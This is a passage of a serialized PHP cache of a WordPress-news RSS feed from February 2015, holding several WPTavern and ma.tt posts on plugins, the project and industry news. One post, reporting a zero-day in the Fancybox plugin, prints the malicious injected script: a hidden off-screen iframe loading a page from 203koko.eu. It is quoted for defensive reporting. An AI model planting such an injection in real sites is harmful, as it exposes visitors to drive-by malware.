consensus.</span></p>\n</blockquote>\n<p>This is a big honor and an uncommon occurrence for the WordPress project. Major congratulations are due to both Helen and Dion.</p>\n<p>Also, we all owe Peter and Ryan a huge round of applause and thanks for their contributions — past, present, and future — to the WordPress project.</p>\n<p>The WordPress.org <a href=\"https://wordpress.org/about\">About</a> page maintains the list of lead developers for WordPress, and with yesterday and today’s announcement, we’re back to five Lead Developers plus Matt Mullenweg as Project Lead. The website now reflects these changes, with fancy (and totally serious) titles for the new lead developers.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 04 Feb 2015 22:52:18 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"Brian Krogsgard\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:19;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:76:\"WPTavern: Zero Day Vulnerability Discovered in Fancybox for WordPress Plugin\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38478\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:86:\"http://wptavern.com/zero-day-vulnerability-discovered-in-fancybox-for-wordpress-plugin\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3172:\"<p>Four hours ago, users seeking support on WordPress.org <a href=\"https://wordpress.org/support/topic/possible-malware-2?replies=41\" target=\"_blank\">reported malware injected into their sites</a> from an unknown source. The vulnerability allows for an iframe to be injected, redirecting to a “203koko” site.</p>\n<pre class=\"brush: xml; light: true; title: ; notranslate\">\n<script>/*<![CDATA[*/if(navigator.userAgent.match(/msie/i)){document.write(\' <div style=\"position:absolute;left:-2000px;width:2000px\"><iframe src=\"http://203koko.eu/hjnfh/ipframe2.php\" width=\"20\" height=\"30\" ></iframe></div>\');}/*]]>*/</script>\n</pre>\n<p>After working together to determine the plugins they have in common, users identified <a href=\"https://wordpress.org/plugins/fancybox-for-wordpress/\" target=\"_blank\">Fancybox for WordPress</a> as the culprit. It has since been temporarily removed from the WordPress Plugins Directory, as it hasn’t been updated for two years and poses a security threat to users. The plugin has received more than half a million downloads and is likely in use on thousands of WordPress sites.</p>\n<p><a href=\"https://kovshenin.com/\" target=\"_blank\">Konstantin Kovshenin</a> and <a href=\"http://codeseekah.com/\" target=\"_blank\">Gennady Kovshenin</a> worked together to analyze sites from affected users to confirm the vulnerability. There is currently no patch, so users of the plugin are advised to turn it off immediately.</p>\n<blockquote class=\"twitter-tweet\" width=\"550\"><p>If you are running Fancybox for <a href=\"https://twitter.com/hashtag/WordPress?src=hash\">#WordPress</a> turn it off now! It contains a persistent XSS <a href=\"https://twitter.com/hashtag/vulnerability?src=hash\">#vulnerability</a> <a href=\"https://twitter.com/hashtag/security?src=hash\">#security</a> <a href=\"https://twitter.com/hashtag/infosec?src=hash\">#infosec</a></p>\n<p>— Gennady Kovshenin (@soulseekah) <a href=\"https://twitter.com/soulseekah/status/563054468183654400\">February 4, 2015</a></p></blockquote>\n<p></p>\n<p>Analysts at Sucuri have <a href=\"http://blog.sucuri.net/2015/02/zero-day-in-the-fancybox-for-wordpress-plugin.html\" target=\"_blank\">confirmed via Website Firewall logs</a> that the vulnerability is being actively exploited:</p>\n<blockquote><p>After some analysis, we can confirm that this plugin has a serious vulnerability that allows for malware (or any random script/content) to be added to the vulnerable site. Because it is currently unpatched, we will not disclose more information.</p>\n<p>What makes things worse, is that it’s being actively exploited in the wild, leading to many compromised websites.</p></blockquote>\n<p>Users who have this plugin installed on their sites have no other option than to disable it, as no patch is available yet. The plugin’s author, <a href=\"https://twitter.com/moskis\" target=\"_blank\">José Pardilla</a>, is aware of the issue and <a href=\"https://wordpress.org/support/topic/not-safe-2?replies=3\" target=\"_blank\">responded to an affected user</a> five hours ago in the plugin’s forum on WordPress.org. A patch should be forthcoming.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 04 Feb 2015 20:57:33 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:20;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:73:\"WPTavern: WordPress.com Adds Google Analytics for Business Customers Only\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38461\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:83:\"http://wptavern.com/wordpress-com-adds-google-analytics-for-business-customers-only\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3378:\"<p>Last week WordPress.com <a href=\"http://en.blog.wordpress.com/2015/01/29/google-analytics-for-wordpress-com-business-sites/\" target=\"_blank\">announced</a> that Google Analytics is now available for its customers on the <a href=\"https://wordpress.com/plans/\" target=\"_blank\">business tier</a>, which is priced at $299.00 per year. Users have been <a href=\"http://en.forums.wordpress.com/topic/google-analytics-please/page/3?replies=107\" target=\"_blank\">clamoring for the feature</a> for years. While many enjoy using the built-in Stats feature, it is severely limited in comparison to Google Analytics and the data is not portable if the user moves to another publishing platform.</p>\n<p>Business customers can now enter a GA tracking ID under Settings → Analytics screen in the new site management area.</p>\n<p><a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/google-analytics-wpdotcom.png\" rel=\"prettyphoto[38461]\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/google-analytics-wpdotcom.png?resize=1025%2C668\" alt=\"google-analytics-wpdotcom\" class=\"aligncenter size-full wp-image-38468\" /></a></p>\n<p>Access to setting up Google Analytics was added to the new backend administration area. Automattic CEO Matt Mullenweg confirms in the comments that all future new features will bypass the old /wp-admin dashboard in favor of the new interface.</p>\n<p>“[There are] no plans to put any new features into the wp-admin dashboard, beyond what comes from core updates from the open source side,” Mullenweg <a href=\"http://en.blog.wordpress.com/2015/01/29/google-analytics-for-wordpress-com-business-sites/#comment-217148\" target=\"_blank\">replied</a> to a comment on the post.</p>\n<p>“You don’t have to stop using wp-admin, and it’s not going anywhere, it’s just not where we’re focusing our energy right now,” he said, in response to a user’s confusion about the two separate admin areas. “As you’ve probably noticed, most of our new updates and iterations are happening in the new interface. You’ll see lots of improvements there in the coming months.”</p>\n<p>Users on the free and premium plans were disappointed that Google Analytics will not be available for all, given that it’s a free service. WordPress.com opted to limit the feature to business customers in order to make it more compelling for users to upgrade to the highest pricing tier. They have taken to the WordPress.com support forums to express <a href=\"http://en.forums.wordpress.com/topic/google-analytics-for-all?replies=2\" target=\"_blank\">dissatisfaction</a> in the feature’s restriction.</p>\n<p>In the past, users have adapted various <a href=\"http://en.forums.wordpress.com/topic/you-can-run-google-analytics-on-a-wordpresscom-blog-heres-how?replies=1\" target=\"_blank\">jerry-rigged methods of adding Google Analytics to WordPress.com sites</a>, using a mapped domain with Cloudflare + Google Analytics enabled. While this is a proven <a href=\"http://jonathonbalogh.com/2012/05/07/how-to-use-google-analytics-on-a-wordpress-com-blog/\" target=\"_blank\">solution</a> for adding the tracking code, it requires using a custom domain with WordPress.com, as well as the ability to follow a few technical instructions. At this time, there is no easy way to add Google Analytics to the bottom tier accounts.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 04 Feb 2015 20:16:14 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:21;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:70:\"WPTavern: Personalize Profile Headers with the BuddyPress Cover Plugin\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38414\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:80:\"http://wptavern.com/personalize-profile-headers-with-the-buddypress-cover-plugin\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3220:\"<p>Cover photos in user profiles is a design feature in place on many major social networking sites, including Facebook, Twitter, and G+. Users enjoy having the ability to further personalize their profiles beyond the default square avatar. Twitter was one of the last to add this feature to timelines in 2012, and when it did, everyone excitedly rushed to <a href=\"http://mashable.com/2012/09/18/how-to-change-twitter-header-image/\" target=\"_blank\">personalize their header images</a>.</p>\n<p>The <a href=\"https://wordpress.org/plugins/bp-cover/\" target=\"_blank\">BuddyPress Cover</a> plugin was created to bring this feature to BuddyPress sites. It allows users to upload a cover image and adapts nicely to nearly every theme.</p>\n<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/bp-cover.png\" rel=\"prettyphoto[38414]\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/bp-cover.png?resize=724%2C489\" alt=\"bp-cover\" class=\"aligncenter size-full wp-image-38422\" /></a></p>\n<p>In addition to the AJAX image upload capabilities, the plugin allows the user to drag the image to re-position it. If the image exceeds the maximum file size, the user will see a warning at the top of the page, prompting him to select another. Believe it or not, the plugin even supports animated gifs as cover images.</p>\n<p>BuddyPress Cover also integrates with the activity stream to post an update when a user adds a new cover photo, similar to what you might see on Facebook.</p>\n<p><a href=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/02/bp-cover-activity-update.png\" rel=\"prettyphoto[38414]\"><img src=\"http://i1.wp.com/wptavern.com/wp-content/uploads/2015/02/bp-cover-activity-update.png?resize=644%2C471\" alt=\"bp-cover-activity-update\" class=\"aligncenter size-full wp-image-38440\" /></a></p>\n<p>I tested the plugin with multiple themes and found that it basically inherits the styles and widths included in your active theme. Most likely you won’t have anything to worry about in terms of theme compatibility. The only thing I noticed is that user profile pictures will need to be larger than 140px square or else the plugin will show the mystery man in the header.</p>\n<p>The plugin’s author plans to add the same capabilities to groups so that admins add cover photos to personalize group pages. So far the plugin has received excellent reviews and users are eager to see more features added to it.</p>\n<p>User suggestions for future releases include the ability to select from previously uploaded cover photos and auto-cropping of the photo in activity updates to match the size shown in the cover area. The developer is open to suggestions and has already pushed out a few point releases in response to bug reports and requests.</p>\n<p>The BuddyPress Cover plugin is a valuable addition to any developer’s toolbox, as clients will often request features they have seen on other social networks. If you’re looking to add greater customization capabilities to user profiles while maintaining the clean design of your theme, this plugin fits the bill. You can <a href=\"https://wordpress.org/plugins/bp-cover/\" target=\"_blank\">download</a> it from WordPress.org.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 04 Feb 2015 00:03:22 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:22;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:29:\"Matt: World Pun Championships\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44646\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:45:\"http://ma.tt/2015/02/world-pun-championships/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:848:\"<blockquote><p>The Pun-Off, held annually since 1978, matches the peculiar energy of a place where the unofficial slogan is “Keep Austin Weird.” This is the city, after all, that organizes Eeyore’s Birthday Party, an outdoor costume party honoring the depressed donkey from Winnie-the-Pooh. […]</p>\n<p>It’s a reunion of legends past. Steve Brooks, a country singer with a mop of gray hair, is the only other person besides Ziek to have won both Punslingers and Punniest of Show in the same year. Retired from competition, he now serves as a judge and emcee.</p></blockquote>\n<p><a href=\"http://www.laweekly.com/news/at-the-world-pun-championships-victory-is-easier-said-than-punned-4767308\">Everything about this article about the World Pun Championships in Austin is amazing</a>, I want to quote the entire thing.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 03 Feb 2015 23:58:00 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:23;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:64:\"WPTavern: Is WordPress Suffering From The Innovator’s Dilemma?\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38412\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:70:\"http://wptavern.com/is-wordpress-suffering-from-the-innovators-dilemma\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4845:\"<a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/InnovationDilemmaFeaturedImage.png\" rel=\"prettyphoto[38412]\"><img class=\"size-full wp-image-38420\" src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/InnovationDilemmaFeaturedImage.png?resize=631%2C323\" alt=\"Innovation Dilemma Featured Image\" /></a>photo credit: <a href=\"http://www.flickr.com/photos/37996588780@N01/273978773\">Scrabble</a> – <a href=\"https://creativecommons.org/licenses/by-sa/2.0/\">(license)</a>\n<p>I’ve used WordPress for more than seven years and I can’t think of any features it has that are innovative. I believe part of the reason is that I’ve been stuck in the WordPress bubble for so long, I haven’t been exposed to different ways of doing things. I only know the WordPress way and that’s a dangerous way of thinking.</p>\n<h2>The Innovator’s Dilemma</h2>\n<p>In 1997, <a class=\"mw-redirect\" title=\"Clayton Christensen\" href=\"http://en.wikipedia.org/wiki/Clayton_Christensen\">Clayton Christensen</a> published the <a title=\"http://en.wikipedia.org/wiki/The_Innovator%27s_Dilemma\" href=\"http://en.wikipedia.org/wiki/The_Innovator%27s_Dilemma\">Innovator’s Dilemma</a>. The book suggests that successful <a class=\"mw-redirect\" title=\"Companies\" href=\"http://en.wikipedia.org/wiki/Companies\">companies</a> can put too much emphasis on customers current needs, and fail to adopt new technology or business models that will meet their customer’s unstated or future needs. Christensen argues that such companies will eventually fall behind.</p>\n<a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/InnovatorsDilemma.png\" rel=\"prettyphoto[38412]\"><img class=\"size-full wp-image-38419\" src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/02/InnovatorsDilemma.png?resize=571%2C466\" alt=\"Book Cover to Innovators Dilemma\" /></a>Book Cover to Innovators Dilemma\n<p>During his appearance at PressNomics, <a title=\"https://twitter.com/jeffr0/status/558778370792493056\" href=\"https://twitter.com/jeffr0/status/558778370792493056\">Matt Mullenweg said</a> that he’s, “worried we have become too much of an inward facing community and afraid to make a painful leap forward to make the next WordPress.” His statement is open to interpretation, but if you compare the WordPress open source project to a company and its users to customers, perhaps what he’s referring to is the idea that WordPress has fallen into the innovator’s dilemma.</p>\n<h2>External Innovation</h2>\n<p>In the Advanced WordPress Facebook group, Joost de Valk responded to Mullenweg’s statement with, “Most innovation is done outside in, not inside out. But to be honest Matt, that’s where the problem lies too. The ‘inside’ is very negative towards change, and is constantly throwing up hurdles. They like small incremental steps, but fear bigger ones.”</p>\n<p>Core WordPress development is done by a trusted team of people who have remained in core decision-making positions for years. It’s rare that an individual new to the community gets commit access or even gets to lead a release within two years.</p>\n<p>I don’t think it’s impossible, but if brand new contributors from outside of the WordPress bubble have little to no influence on the project, where is the opportunity for external innovation?</p>\n<h2>Leading by Example</h2>\n<p>Another statement Mullenweg made at PressNomics is that he wants to lead another release. Leading a release gives him the opportunity to lead by example and push for big changes, something he feels the community fears.</p>\n<h2>A Thought Experiment</h2>\n<p>What do you think are innovative features in WordPress? I’m especially curious to see how users answer the question versus developers. I’d also like to know what features in other publishing systems WordPress could learn from. An excellent example is the post editor in Medium which Mullenweg <a title=\"https://twitter.com/jeffr0/status/558777784932118531\" href=\"https://twitter.com/jeffr0/status/558777784932118531\">has admitted</a> offers a better experience than WordPress.</p>\n<h2>Can WordPress Avoid Irrelevance?</h2>\n<p>The road to 50% market share is tough and to some, <a title=\"http://wptavern.com/how-important-is-jetpack-on-wordpress-road-to-50-market-share#comment-63337\" href=\"http://wptavern.com/how-important-is-jetpack-on-wordpress-road-to-50-market-share#comment-63337\">is impossible</a> to achieve. Without innovation and continuous improvements to satisfy the needs of users, it’s entirely possible for WordPress to develop itself into irrelevance. Then again, what could WordPress developers do today to prevent this from happening? Is it a matter of changing philosophies and strategies or is it something else?</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 03 Feb 2015 23:20:13 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:24;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:70:\"WPTavern: Human Made Acquires Australian Based WordPress Agency Sennza\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38401\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:80:\"http://wptavern.com/human-made-acquires-australian-based-wordpress-agency-sennza\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2074:\"<a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2014/08/MergeFeaturedImage.png\" rel=\"prettyphoto[38401]\"><img class=\"size-full wp-image-28143\" src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2014/08/MergeFeaturedImage.png?resize=678%2C252\" alt=\"Merge Featured Image\" /></a>photo credit: <a href=\"https://www.flickr.com/photos/rutlo/3743291132/\">rutlo</a> – <a href=\"http://creativecommons.org/licenses/by/2.0/\">cc</a>\n<p><a title=\"http://hmn.md/\" href=\"http://hmn.md/\">Human Made</a> has acquired Australian based WordPress development agency <a title=\"http://www.sennza.com.au/\" href=\"http://www.sennza.com.au/\">Sennza</a>. Human Made is a development shop with more than 20 employees and has offices scattered across the world. They’re also a <a title=\"http://vip.wordpress.com/partners/\" href=\"http://vip.wordpress.com/partners/\">WordPress.com VIP partner</a>. Sennza and its three employees will continue to work from their office and become Human Made Australia.</p>\n<p>The move gives Human Made an opportunity to tap into the enterprise market in Australia as well as help out with other projects across Asia, India, and the US West Coast. According to <a title=\"http://www.sennza.com.au/2015/02/03/sennza-joining-human-made/\" href=\"http://www.sennza.com.au/2015/02/03/sennza-joining-human-made/\">Sennza’s announcement</a>, talks of the acquisition began at WordCamp Europe in Sofia, Bulgaria.</p>\n<blockquote><p>Although we had met and spoken with Human Made previously, we got the chance to really meet and hang out with most of the team while at WordCamp Europe in Sofia, Bulgaria which helped to confirm this was the right decision to make.</p></blockquote>\n<p>Earlier this year at PressNomics, one of the topics of discussion is that we’re at the beginning stages of a consolidation period for agencies in the WordPress space. This move solidifies the belief that acquisitions involving 10 employees or less appear likely as larger shops look for opportunities to expand their reach and acquire talent at the same time.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 03 Feb 2015 22:11:05 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:25;a:6:{s:4:\"data\";s:13:\"\n \n \n \n \n \n \n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:84:\"WPTavern: How a Crowdsourced Code Snippet Library Can Boost Your Open Source Project\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=37151\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:94:\"http://wptavern.com/how-a-crowdsourced-code-snippet-library-can-boost-your-open-source-project\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:4387:\"<p>Roughly one year ago this month Pippin Williamson made the first commit to Easy Digital Download’s “<a href=\"https://github.com/easydigitaldownloads/library\" target=\"_blank\">Library</a>” repository on GitHub. He created the library to be a community-maintained repository of code snippets that modify the default behavior of Easy Digital Downloads.</p>\n<p>So far the library has received 113 commits from eight contributors, which has resulted in more than sixty code snippets available to users and developers. The snippets cover everything from modifying the checkout experience to customizing the plugin’s email notifications.</p>\n<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/edd-code-snippet-library.png\" rel=\"prettyphoto[37151]\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/02/edd-code-snippet-library.png?resize=1025%2C951\" alt=\"edd-code-snippet-library\" class=\"aligncenter size-full wp-image-38381\" /></a></p>\n<p>With more than half a million downloads on <a href=\"https://wordpress.org/plugins/easy-digital-downloads/\" target=\"_blank\">WordPress.org</a> and 150+ free and commercial <a href=\"https://easydigitaldownloads.com/extensions/\" target=\"_blank\">extensions</a>, Easy Digital Downloads has a large community of developers who work with the software every day.</p>\n<p>Williamson said that having the ability to share snippets for modifying EDD behavior has been hugely useful for the project. He only approves solid, tested code but in most cases the snippets have been submitted by the EDD team. Managing the repository hardly costs any time at all, “a few minutes per week at max,” he said.</p>\n<p>The benefits of hosting a community-maintained repository of code snippets far outweigh the minimal time required to maintain it. “The biggest problem it has is humans: we tend to forget to put snippets up a lot of times,” Williamson said. He identified three key areas where the library benefits the project:</p>\n<ul>\n<li>It’s a resource for the support team.</li>\n<li>It’s a source of examples for people wanting to customize behavior.</li>\n<li>It provides live testing (similar to 